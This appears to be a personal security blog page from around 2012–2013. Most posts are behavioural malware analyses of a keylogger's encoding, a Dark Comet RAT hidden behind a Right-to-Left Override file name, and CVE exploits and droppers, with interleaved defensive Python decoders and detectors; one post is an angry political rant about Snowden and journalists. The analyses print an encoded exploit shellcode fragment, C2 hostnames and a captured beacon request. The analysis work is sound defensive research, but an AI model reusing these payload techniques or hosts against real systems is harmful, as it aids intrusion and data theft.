Tuesday, June 11, 2013

Snowden is NOT a hero, but rather the lowest form of scum on the planet!!!

I haven't blogged anything in quite a while, because I've been busy with other work and projects, but I feel compelled to get this off my chest.  Edward J Snowden (it makes me ill to speak or type his name), is no hero, but rather a traitor.  In my book he is no different than John Walker, Robert Hanssen and Aldrich Ames, etc.  No, I take that back, I believe he's actually worse, because his treasonous act was a deliberate attempt to damage the United States and he knows it.  Why else did the chicken-shit bastard run to Hong Kong?  He should be convicted of treason and punished to the highest extent of the law.

Not only that, I believe the low-life reporters, Glenn Greenwald and Laura Poitras, should be prosecuted as accessories to the crime.  How would they feel if one of their co-workers stole their notes on every story they were working on, then sold those notes to a competitor that beat them to the punch, thus receiving all the "financial rewards"?  Would Greenwald and Poitras applaud that effort and would they call that person a hero, or would they seek justice, demanding the thief be prosecuted?  I bet they'd vote for the latter.  Greenwald and Poitras, if you are reading this, you make my skin crawl just as much as Snowden, because your type of journalism is damaging whether you want to admit it or not.  History has shown time and time again that the media's total disregard for security and safeguarding ongoing investigations has led to successful acts of violence that include terrorist attacks.

As for all those with the "public has the right to know everything" mindset, think about this.  Suppose there were indications of plans for a violent act in your city, but someone leaked that information to the press and the press reported it.  As a result, the suspect got away, only to return months later to carry out their plan, which ultimately led to one or some of your loved ones meeting a tragic demise.  Would you still feel it was a good thing that the public was made aware of everything?  I think not.

And lastly, the above scenario is one that would be of interest with regards to security.  Believe me, anyone in that field has no interest, nor the time, to read all your email to Aunt Sally or to review all your phone calls or web surfing activity, etc., unless something triggers an alert warranting further investigation by the appropriate authorities.

Well, I now feel better getting that off my chest, but at least I didn't betray my country in doing so.

Tuesday, December 4, 2012

Manually Decoding Keylogged Data Files: One Man's Technique

Have you ever found yourself in a time-crunch when your boss needs your analysis yesterday?  I think it's safe to assume the vast majority of us have been in that situation before.  Well, the other day was no different for me, except that I was looking at a custom-packed keylogger while drinking my morning java before heading into work, hence my time-crunch.

As it turned out, the keylogger encoded its output and I really wanted to see what it was keylogging, but I didn't have time to throw the binary into my debugger, unpack it, step through it until I found the key, then decode the output.  So, I ended up just "eyeballing" the output file until I found the key.  I've also done this with keylogged data files I extracted from compromised hard drives when the actual keylogger was no longer present.  In view of this, I'd like to share this simple technique, as it may come in handy for someone who is pressed for time or for someone who conducts behavioral malware analysis but isn't proficient with debuggers or disassemblers.

The first thing I do is run the binary dynamically to see what footprint it leaves and to see what network traffic it spawns.  I also look for the presence of keylogging.  To that end, I'll open Notepad and start typing "trash talk" in case there's a keylogger, but I'll always successively hit the "return" key at least eight times, which will create 16 bytes.  I'll also throw in a series of backspaces for good measure.  This way, if it is keylogging and if the output is obfuscated, I should be able to see those returns and backspaces.  For example, since the return key generates \x0D \x0A (carriage return, newline), I look for a series of repeated double-byte combinations in my hex editor.  So when I see something like 98 9F 98 9F 98 9F, I'll assume those might be my XOR'd return bytes.  To find the key, I XOR one byte with what I believe it should decode to, so in this case I'll XOR \x98 with \x0D and that result represents my probable key.  I then XOR the entire keylogged data file with the probable key, and if I can read the file, it's correct.  In the example below, the double-byte pattern can be seen at offset 80 and the XOR key in this case was \xA2.

Now back to the other morning I spoke of earlier.  The encoded keylog data wasn't as straightforward as the example above.  I did see a double-byte pattern, \x88 \x85, but I quickly found that a single-byte XOR key wasn't used.  I then figured it would be a rolling XOR key, but that wasn't it either.  After looking at it a bit further, I thought it might be a byte-for-byte substitution key, but as luck would have it, I was out of time and had to get ready for my day job.  While I was getting ready, however, it hit me.  It wasn't using a substitution key, it was using addition to encode its output.  So I finished getting ready, ran downstairs and subtracted \x0D from \x88, which gave me \x7B.  I then subtracted \x7B from \x85 and sure enough, I got \x0A.  So my keylogger turned out to add \x7B to every keylogged byte.  I then let Python do the math for me and decoded the keylogged output file.  After that, I finished my coffee, logged off, and went to work.

Below are the encoded and decoded keylog data, which come from a Bifrost variant.  The double-byte patterns can be seen in multiple places, but they stand out at offsets 0, 81 and C2.
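The two "eyeballing" steps above (derive a single-byte XOR key from the repeated CR/LF pair, or an additive key when XOR does not fit) as one script, written for this post rather than taken from it; the encoded samples it runs on are constructed here from the two keys the post found (\xA2 XOR and +\x7B), and the text-likeness check is my own heuristic.

```python
"""Recover a single-byte XOR or additive key from encoded keylog data by
locating the repeated CR/LF pair the analyst typed.  Added example; not the
post's own code."""

CRLF = b"\r\n"  # \x0D \x0A, what each press of the return key produces


def candidate_pairs(data: bytes, min_repeats: int = 4):
    """Yield byte pairs that repeat back-to-back at least min_repeats times."""
    seen = set()
    for i in range(len(data) - 2 * min_repeats):
        pair = data[i:i + 2]
        if pair in seen:
            continue
        if data[i:i + 2 * min_repeats] == pair * min_repeats:
            seen.add(pair)
            yield pair


def xor_key_from_pair(pair: bytes):
    """Key k with pair ^ k == CRLF, or None if no single byte explains both."""
    k = pair[0] ^ CRLF[0]
    return k if pair[1] ^ k == CRLF[1] else None


def add_key_from_pair(pair: bytes):
    """Key k with (pair - k) mod 256 == CRLF, or None if inconsistent."""
    k = (pair[0] - CRLF[0]) & 0xFF
    return k if (pair[1] - k) & 0xFF == CRLF[1] else None


def decode(data: bytes, key: int, mode: str) -> bytes:
    if mode == "xor":
        return bytes(b ^ key for b in data)
    if mode == "add":
        return bytes((b - key) & 0xFF for b in data)
    raise ValueError(mode)


def looks_like_text(data: bytes, threshold: float = 0.9) -> bool:
    """Heuristic (assumption): mostly printable ASCII plus CR/LF/tab/backspace."""
    ok = sum(1 for b in data if 32 <= b < 127 or b in b"\r\n\t\x08")
    return ok / max(len(data), 1) >= threshold


def recover(data: bytes):
    """Return (mode, key, plaintext) for the first candidate that decodes to text."""
    for pair in candidate_pairs(data):
        for mode, derive in (("xor", xor_key_from_pair), ("add", add_key_from_pair)):
            key = derive(pair)
            if key is None:
                continue
            plain = decode(data, key, mode)
            if looks_like_text(plain):
                return mode, key, plain
    return None


# Constructed sample: "trash talk", two backspaces, eight returns, a command.
SAMPLE_PLAIN = b"trash talk for the logger\x08\x08" + CRLF * 8 + b"netstat -ano\r\n"
SAMPLE_XOR = decode(SAMPLE_PLAIN, 0xA2, "xor")               # post's first case
SAMPLE_ADD = bytes((b + 0x7B) & 0xFF for b in SAMPLE_PLAIN)  # post's second case

if __name__ == "__main__":
    for label, blob in (("xor sample", SAMPLE_XOR), ("add sample", SAMPLE_ADD)):
        mode, key, plain = recover(blob)
        print(f"{label}: mode={mode} key=0x{key:02X} -> {plain!r}")
```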

Thursday, November 29, 2012

Heyoka: A Classic Rock "Must Have" from San Antonio

If you were rockin' in south Texas during the late seventies/early eighties you're probably quite familiar with the San Antonio band Heyoka.  They opened for just about every major rock band to hit San Antonio, to include Rush.  More importantly though, they never refused to kick ass!  However, to my knowledge they only released a few 7" singles, of which I am extremely proud to have the one pictured below (keep reading for the Good News).

Fast forward about 30 years and some of their music has finally been released on CD and Vinyl.  So if you're a Heyoka fan or you get into groups like Jethro Tull, Kansas and Rush, I highly recommend you visit the link below and pick up Heyoka's "The Spirit of Revelation" CD and/or the Vinyl.  The vinyl contains two extra songs. 


You should also check out "http://www.reverbnation.com/patrickhoodandheyoka/songs".  You can stream Heyoka and rock out as you reverse the latest 0-day.  Also, the reverbnation page has a couple songs not on the CD or Vinyl, of which my personal favorite (in case you must know) is "Whot Boogie?".

Now let's get back to some malware...

Tuesday, July 10, 2012

Dark Comet "PDF" (pdf? - yea, right!)

Last weekend I pulled down a "Dark Comet RAT"-related sample from Contagio (http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html#more) to look at and found it to be interesting because it was operating under the guise of a PDF.

The malicious file (er, PDF), shown below, employs the Right-to-Left Override (RLO) technique in order to mask the actual file type on a victim host susceptible to RLO.  In the case of this file, analysis was conducted from within a Windows XP virtual machine, and since Windows XP doesn't interpret this RLO technique, the file immediately appeared in its true state when viewing file extensions (see diagram 1).

Conversely, on a Windows 7 platform, the RLO technique is understood.  Therefore the malicious file would appear to be a regular PDF file to the unsuspecting user (see diagram 2).

Be that as it may, if the user (on whichever platform) were to notice the item type “Screen saver”, when using the Explorer “tiles” view (see diagram 3), an alarm bell should immediately sound since a SCR file is an executable binary.

The RLO technique has been used quite a bit in recent years to obfuscate the name of a malicious file.  It works by inserting the Unicode character U+202E (Right-to-Left Override) at a desired point, after which everything will appear in reverse (right-to-left) order.  For example, the character was placed in front of the letter "f" in fdp.scr (hence the "square" in diagram 1), making it read as "rcs.pdf" (in diagram 2).
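A small checker for the trick just described, written for this post (not code from it): it renders a file name the way a bidi-aware shell would, strips the invisible controls to get the name the OS really uses, and flags any mismatch between the two extensions. The sample names are constructed; the rendering is a simplified model that only handles U+202E up to a U+202C terminator.

```python
"""Flag file names that use a Unicode bidi override (RLO, U+202E) to disguise
their real extension, as in the post's fdp.scr -> rcs.pdf case.
Added example, not code from the post."""

RLO = "\u202e"              # RIGHT-TO-LEFT OVERRIDE
PDF_TERMINATOR = "\u202c"   # POP DIRECTIONAL FORMATTING ends the override
# Bidi control characters that have no business in a file name.
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}


def rendered_name(name: str) -> str:
    """Approximate what a bidi-aware file browser shows: text after an RLO up
    to the next PDF (or the end) is displayed reversed; controls are invisible.
    Simplified model (assumption): nested or other overrides are just dropped."""
    out, i = [], 0
    while i < len(name):
        ch = name[i]
        if ch == RLO:
            end = name.find(PDF_TERMINATOR, i + 1)
            if end == -1:
                end = len(name)
            out.append(name[i + 1:end][::-1])
            i = end + 1
        elif ch in BIDI_CONTROLS:
            i += 1
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def true_name(name: str) -> str:
    """The name the OS actually uses once the invisible controls are dropped."""
    return "".join(ch for ch in name if ch not in BIDI_CONTROLS)


def extension(name: str) -> str:
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


def analyse(name: str) -> dict:
    """Compare the displayed extension with the real one and flag mismatches."""
    shown, real = rendered_name(name), true_name(name)
    has_control = any(ch in BIDI_CONTROLS for ch in name)
    return {
        "displayed": shown,
        "actual": real,
        "displayed_ext": extension(shown),
        "actual_ext": extension(real),
        "suspicious": has_control and extension(shown) != extension(real),
    }


# Constructed sample names: the post's case (RLO just before the "f" of
# "fdp.scr") next to an ordinary PDF for comparison.
SAMPLES = ["Report" + RLO + "fdp.scr", "Report.pdf"]

if __name__ == "__main__":
    for n in SAMPLES:
        r = analyse(n)
        print(f"shown as {r['displayed']!r}, really {r['actual']!r}, "
              f"suspicious={r['suspicious']}")
```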

Closer examination of the SCR file, however, revealed it was actually a WinRAR self-extracting (SFX) compressed archive containing three objects, which would be extracted with the SFX script displayed in diagram 4.


Upon execution of the "PDF", the contents are automatically extracted to the user's %temp% directory (see diagram 5).  Notice the lack of an icon for "Explorer.exe".


Immediately thereafter, the malicious "Explorer.exe" is launched along with the benign PDF, but all the victim user would see during all this would be the opening of the benign PDF, a portion of which is displayed in diagram 6.


In addition, the malware injects itself into a "svchost.exe" process, which invokes a keylogger straight away that writes unencrypted keylog data to "%temp%\dclogs.sys" (see the appendix for an example of the keylog data).

The victim system then connects to "meroo.no-ip.org"; however, no specific HTTP request was observed during this analysis.  More importantly, another svchost process is spawned (svcHost.exe, note the upper case "H") which opens a dedicated backdoor on port 778 (see diagram 7), through which the victim host reaches out to IP address

1688  svcHost        ->  1060  TCP   c:\Windows\system32\svcHost.exe   (capital H)
TCP         SYN_SENT        1688

Since this analysis was conducted from within an enclosed environment, any follow-on communication between the victim host and the command and control server was not observed.

To maintain persistence on the victim host, the following registry key is created:
C:\Documents and Settings\<user>\Start Menu\Programs\Startup
Interestingly, the Startup folder contains a link file "(Empty).lnk" which points to
"C:\Documents and Settings\<user>\Local Settings\Temp\Explorer.exe" (see diagram 9).


Below is a chronological gist of activity as it occurs on a victim host (of note, the malicious dropper was renamed "asfdp.scr" for ease of interpretation):



-> C:\Documents and Settings\<user>\Local Settings\Temp\Explorer.exe

-> C:\Documents and Settings\<user>\Local Settings\Temp\msdlg.ocx

-> C:\Documents and Settings\<user>\Local Settings\Temp\registry:


-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{2ae4eccf-38d9-11dd-8e16-806d6172696f}\BaseClass

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{2ae4eccd-38d9-11dd-8e16-806d6172696f}\BaseClass

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{2ae4eccc-38d9-11dd-8e16-806d6172696f}\BaseClass

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal

-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Common Documents

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop

-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Common Desktop

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Start Menu

-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Common Start Menu

-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Common AppData

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\My Pictures

-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\CommonPictures

-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\CommonMusic

-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\CommonVideo


-> C:\Documents and Settings\<user>\Start Menu\Programs\Startup\(Empty).lnk

registry: SetValueKey

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache

-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies

Process: created

-> C:\Documents and Settings\<user>\Local Settings\Temp\Explorer.exe

-> C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe

Explorer.exe (malicious variant in %temp%)

process: terminated

-> C:\Documents and Settings\<user>\Desktop\asfdp.scr

process: created

-> C:\WINDOWS\system32\svchost.exe


-> C:\Documents and Settings\<user>\Local Settings\Temp\~DF8DB9.tmp


process: terminated

-> C:\Documents and Settings\<user>\Local Settings\Temp\Explorer.exe


-> C:\Documents and Settings\<user>\Local Settings\Temp\dclogs.sys

And lastly, here's a sample of the keylogged data:


@ Caption : [C:\WINDOWS\system32\cmd.exe]

@ at 7:42:52 AM the 7/6/2012



@ Caption : [shell]

@ at 7:43:36 AM the 7/6/2012

netstat -ano



@ Caption : [areyoukeylogginme.txt - Notepad]

@ at 7:49:45 AM the 7/6/2012

Seriously????  You're keylogging me????   Ane [<-][<-]d you didn't think I'd notice????  Shame on you :(



@ Caption : [shell]

@ at 7:55:56 AM the 7/6/2012

cd ..

find /i "dclogs" c        [<-][<-][<-][<-][<-][<-]p       | more

find "[<-]/i "explorer.exe" c [<-][<-][<-][<-][<-][<-]pa     [<-]t    | more



@ Caption : [Program Manager]

@ at 7:57:25 AM the 7/6/2012


Wednesday, June 27, 2012

Music To Reverse To

If you're like me, you like some good tunes filling the air while reversing a pesky piece of malware.  However, I find that sometimes the vocals interfere with my train of thought, which is why I found it so cool when I stumbled across Dream Theater's "Train of Thought Instrumental Demos" album.  It's awesome and it didn't interfere one bit with my, uh, train of thought (I never thought I'd say that three times in the same paragraph).

Anyway, the album is awesome, and since Dream Theater always incorporates a lot of instrumental dialogue, you can listen to a track without the words and still enjoy it, because it's not like listening to the same 8 bars over and over again.  And now that I think about it, another one of their albums that would be great to "reverse" to would be "Black Clouds & Silver Linings CD3".  It's the instrumental versions of CD1, which is awesome.  And lastly, if you like progressive metal instrumentals, check out "Liquid Tension Experiment", which features some Dream Theater personnel.  Well, gotta run for now.  Until next time...

Wednesday, June 20, 2012

CVE-2012-1875 Encoded Reach Back Decoding

One of the first things I do when I get a new exploit sample (e.g. CVE-2012-1875) is try to determine what (or where) the payload is, after which I'll try to obtain it for further analysis.  In the case of the two samples provided by Contagio (http://contagiodump.blogspot.com/2012/06/cve-2012-1875-links-and-samples.html), I looked through the HTML pages in search of an "in the clear" redirect or a script.  Immediately, the variable "vbc" jumped out at me (see the snippet below).

var vbc =("NewYoukv10EBNewYoukv4B5BNewYoukvC933NewYoukvB966NewYoukv0171NewYoukv3480NewYoukv110BNewYoukvFAE2NewYoukv05EBNewYoukvEBE8NewYoukvFFFFNewYoukvF8FFNewYoukv1013NewYoukv1111NewYoukv754E"+

The first thing that stands out is the delimiter "NewYoukv".  Once removed, we end up with something like this:

When approaching it this way, however, don't forget to swap the bytes (remember our good friend Unicode? each %uXXXX unit is stored low byte first).  This will give us something like this:

Or, we can always look down the html script a little to see what's going on with this variable:
- var xbc=vbc.replace(/NewYoukv/g,"%u");   
- var gjb=unescape(xbc);

We're not quite out of the woods yet, though.  This is because we still need to XOR the script with 0x11 to reveal the reach back to the malicious payload.  The two pics below show a "before and after" comparison of the tail section of two different samples; the reach back is revealed in the "decoded" section.  Now all we gotta do is grab the two executables for analysis (before they are taken down) and implement the appropriate mitigation strategies.
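The three steps above (drop the delimiter, rebuild the little-endian bytes that unescape() would produce, XOR the body with 0x11) as a script, written for this post rather than taken from it. It runs on the vbc fragment quoted above; the 0x17-byte stub length it skips is my own reading of those bytes (jmp / pop ebx / dec ebx / xor ecx,ecx / mov cx,0x171 / xor byte [ebx+ecx],0x11 / loop / jmp / call), not something the post states.

```python
"""Decode the CVE-2012-1875 sample's "vbc" blob the way the post describes.
Added example; not the post's or the sample's own script."""
import re

DELIM = "NewYoukv"
XOR_KEY = 0x11
# Assumption: length of the decoder stub that precedes the XOR'd body, from my
# reading of the 30 bytes quoted on the page; first encoded byte is at 0x17.
STUB_LEN = 0x17

# The vbc fragment exactly as quoted in the post (the real variable goes on).
VBC_FRAGMENT = ("NewYoukv10EBNewYoukv4B5BNewYoukvC933NewYoukvB966NewYoukv0171"
                "NewYoukv3480NewYoukv110BNewYoukvFAE2NewYoukv05EBNewYoukvEBE8"
                "NewYoukvFFFFNewYoukvF8FFNewYoukv1013NewYoukv1111NewYoukv754E")


def unescape_units(encoded: str, delim: str = DELIM) -> bytes:
    """Same transform as vbc.replace(/NewYoukv/g,"%u") followed by unescape():
    each %uXXXX unit is one UTF-16 code unit, i.e. two bytes, low byte first."""
    text = encoded.replace(delim, "%u")
    units = re.findall(r"%u([0-9A-Fa-f]{4})", text)
    return b"".join(int(u, 16).to_bytes(2, "little") for u in units)


def decode_body(blob: bytes, stub_len: int = STUB_LEN, key: int = XOR_KEY) -> bytes:
    """Leave the stub untouched and XOR everything after it with the key."""
    return blob[:stub_len] + bytes(b ^ key for b in blob[stub_len:])


def printable_strings(data: bytes, min_len: int = 6) -> list:
    """ASCII runs in the decoded blob; on a full sample this is where the
    reach-back URL shows up."""
    return [m.decode() for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def hexdump(data: bytes) -> str:
    return " ".join(f"{b:02X}" for b in data)


if __name__ == "__main__":
    raw = unescape_units(VBC_FRAGMENT)
    decoded = decode_body(raw)
    print("raw     :", hexdump(raw))
    print("decoded :", hexdump(decoded))
    print("strings :", printable_strings(decoded))
```

On the fragment only the seven bytes after the stub get decoded; run it on the whole vbc string and printable_strings() is the quick way to spot the reach back.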

Thursday, June 14, 2012

Quick Malware Notes: "WPCT Action Plan from Environment Group.doc" (payload operates under the guise of itunes)

A few days ago, Contagio Malware Dump posted 90 malware samples (http://contagiodump.blogspot.com/2012/06/90-cve-2012-0158-documents-for-testing.html#more).  My wife wondered why my mouth was drooling.  I told her it was a geek thing and she said "cool", then went back to playing Angry Birds.

Anyway, I've only had time to look at one out of the 90 so far, but the one I picked turned out to be a little interesting.  I say that because the malicious RTF file drops "winword.exe" on the victim host, which further drops "itunes.exe" on the system, both of which are malicious and not what they appear to be (by file name).  In addition, a registry key (see below) is created for persistence.

HKU\S-1-5-21-2052111302-413027322-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Run\SysUpdate: "C:\Documents and Settings\<user>\Local Settings\Application Data\itunes.exe"

Since most users probably have iTunes loaded, this would probably not appear malicious if they noticed it running; they'd probably just think iTunes was looking for updates.
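One way to catch exactly this kind of autorun entry on a host, written for this post (not code from it): parse `reg query` output for the Run key and flag values whose image name belongs to a well-known product but runs from a user profile directory instead of its install location. The reg query text is constructed to mirror the SysUpdate value shown above, and the allow-list of known binaries is a short illustrative assumption.

```python
"""Flag Run-key entries whose image impersonates a well-known program but runs
from a user-writable location, like the post's SysUpdate -> itunes.exe entry.
Added example, not code from the post."""
import ntpath
import re

# Assumption: a short illustrative allow-list of where these names normally live.
KNOWN_BINARIES = {
    "itunes.exe": ["\\program files\\itunes\\"],
    "winword.exe": ["\\program files\\microsoft office\\"],
    "explorer.exe": ["\\windows\\"],
}
# User-writable drop locations seen in the posts on this page.
RISKY_DIRS = ("\\local settings\\application data\\",
              "\\local settings\\temp\\", "\\appdata\\")

# One value line of XP-era `reg query` output: name, type, data.
VALUE_LINE = re.compile(r"^\s*(\S.*?)\s+(REG_SZ|REG_EXPAND_SZ)\s+(.*)$")


def parse_reg_query(text: str) -> list:
    """Return [{key, name, command}] for every value under each listed key."""
    entries, key = [], None
    for line in text.splitlines():
        if line.startswith("HK"):
            key = line.strip()
            continue
        m = VALUE_LINE.match(line)
        if m and key:
            entries.append({"key": key, "name": m.group(1),
                            "command": m.group(3).strip()})
    return entries


def image_path(command: str) -> str:
    """First token of the command line, honouring a quoted path."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.find('"', 1)]
    return command.split(" ", 1)[0]


def assess(entry: dict) -> dict:
    """Attach the reasons an entry looks like masquerading persistence."""
    path = image_path(entry["command"]).lower()
    base = ntpath.basename(path)
    reasons = []
    if base in KNOWN_BINARIES and not any(d in path for d in KNOWN_BINARIES[base]):
        reasons.append(f"{base} outside its usual install directory")
    if any(d in path for d in RISKY_DIRS):
        reasons.append("runs from a user-writable profile directory")
    return {**entry, "image": path, "reasons": reasons, "suspicious": bool(reasons)}


# Constructed reg query output: the post's SysUpdate value plus two benign ones.
SAMPLE_REG_QUERY = """
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
    SysUpdate    REG_SZ    "C:\\Documents and Settings\\<user>\\Local Settings\\Application Data\\itunes.exe"
    iTunesHelper    REG_SZ    "C:\\Program Files\\iTunes\\iTunesHelper.exe"
    ctfmon.exe    REG_SZ    C:\\WINDOWS\\system32\\ctfmon.exe
"""

if __name__ == "__main__":
    for e in parse_reg_query(SAMPLE_REG_QUERY):
        r = assess(e)
        flag = "!!" if r["suspicious"] else "  "
        print(f"{flag} {e['name']:14} {r['image']}  {'; '.join(r['reasons'])}")
```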

Due to my having to get to my day job, I wasn't able to dive into the code yet, but I was able to take a quick behavioral look at this, and here's a chronological gist of what happens on a compromised system:

Upon execution of "WPCT  Action Plan from Environment Group.doc"...

explorer.exe (legit process)
process: created
-> C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE

WINWORD.EXE (in office11 - legit process)
file: Write
-> C:\Documents and Settings\<user>\Desktop\~$H WPCT  Action Plan from Environment Group.doc
-> C:\Documents and Settings\<user>\Local Settings\Temp\Winword.exe
-> C:\Documents and Settings\<user>\Desktop\6TH WPCT  Action Plan from Environment Group.doc
process: created
-> C:\Documents and Settings\<user>\Local Settings\Temp\Winword.exe

Winword.exe (in %Temp% - malicious)
registry: SetValueKey
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Local AppData
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{2ae4eccf-38d9-11dd-8e16-806d6172696f}\BaseClass
file: Write
-> C:\Documents and Settings\<user>\Local Settings\Application Data\itunes.exe
process: created
-> C:\Documents and Settings\<user>\Local Settings\Application Data\itunes.exe
process: created C
-> C:\WINDOWS\system32\cmd.exe

cmd.exe (legit process, but used by malware)
process: created
-> C:\WINDOWS\system32\reg.exe
process: terminated C
-> C:\WINDOWS\system32\reg.exe

reg.exe (legit process, but used by malware)
registry: SetValueKey
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SysUpdate

Winword.exe (%Temp% - malicious)
process: terminated
-> C:\WINDOWS\system32\cmd.exe

itunes.exe (malicious)
registry: SetValueKey
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Recent
registry: SetValueKey
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{2ae4eccf-38d9-11dd-8e16-806d6172696f}\BaseClass
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{2ae4eccd-38d9-11dd-8e16-806d6172696f}\BaseClass
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{2ae4eccc-38d9-11dd-8e16-806d6172696f}\BaseClass
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache
-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Directory
-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Paths
-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1\CachePath
-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2\CachePath
-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3\CachePath
-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4\CachePath
-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1\CacheLimit
-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2\CacheLimit
-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3\CacheLimit
-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4\CacheLimit
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\History
-> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Common AppData
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MigrateProxy
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
registry: DeleteValueKey
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
registry: SetValueKey
-> HKLM\SYSTEM\ControlSet001\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
-> HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet


POST /im/linux.php HTTP/1.1
Host: www.maintechy.com
Content-Length: 2281
Cache-Control: no-cache

After I'm able to take a deeper look at this, I'll update this post accordingly.


File: 6TH WPCT  Action Plan from Environment Group.doc
Size: 167856
MD5:  e836e9ee613bbebfe076ce67c589ae3c
SHA1: 64c2e4384b7ebbdc040453394b203e5d7f0254db

File: Winword.exe
Size: 129536
MD5:  4467369a848fee1424494833237e7b42
SHA1: d7b9f6679ad14b098b41bb80120c97df0e9fa9f7
ssdeep: 3072:Oe5amp1VKNM4kA2xIM7wqEBAMQw8SupZth3pz9:KmpGvpM4AMQw8F7
Compile Time: 4F62A02C (Fri, 16 March 2012 02:06:36 UTC)

File: itunes.exe
Size: 73216
MD5:  972c692625bd57f0c7264c9e048752f6
SHA1: bb9ede8d7243060736a481bee3e0acb2b3b8efd3
ssdeep: 1536:DkXcS22xQxM7K9BqEdDAGlPnI4A7Dte+Rk0SuPxZth3pz:DkA2xIM7wqEBAMQw8SupZth3pz
Compile Time: 4F629F39 (Fri, 16 March 2012 02:02:33 UTC)